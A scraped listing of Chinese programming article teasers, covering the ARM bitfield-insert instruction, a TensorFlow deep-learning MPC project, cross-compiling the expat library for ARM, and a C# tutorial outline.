Bitfield Insert copies a bitfield of <width> bits from the least significant bits of the source register to bit position <lsb> of the destination register, leaving the other destination bits unchanged. 位域插入将<width>位的位域从源寄存器的…

Python实现深度学习模型预测控制(tensorflow)DL-MPC(Deep Learning Model Predictive Control

链接&#xff1a;深度学习模型预测控制 &#xff08;如果认为有用&#xff0c;动动小手为我点亮github小星星哦&#xff09;&#xff0c;持续更新中…… 链接&#xff1a;WangXiaoMingo/TensorDL-MPC&#xff1a;DL-MPC&#xff08;深度学习模型预测控制&#xff09;是基于 P…

ubuntu交叉编译expat库给arm平台使用

1.下载expat库源码: https://github.com/libexpat/libexpat/release?page=2 wget https://github.com/libexpat/libexpat/release/download/R_2_3_0/expat-2.3.0.tar.bz2 下载成功: 2.解压expat库,并进入解压后的目录: tar xjf expat-2.3.0.tar.bz2 cd expat-2.3.0 <…

C# 编程语言学习教程

C# 编程语言学习教程 目录 C# 简介 1.1 什么是 C#1.2 C# 的特点1.3 C# 的应用领域 环境搭建 2.1 安装 Visual Studio2.2 创建第一个 C# 项目 基础语法 3.1 数据类型3.2 控制结构3.3 数组与字符串 面向对象编程 4.1 类与对象4.2 继承与多态4.3 接口与抽象类 常用库与框架 5.1 .…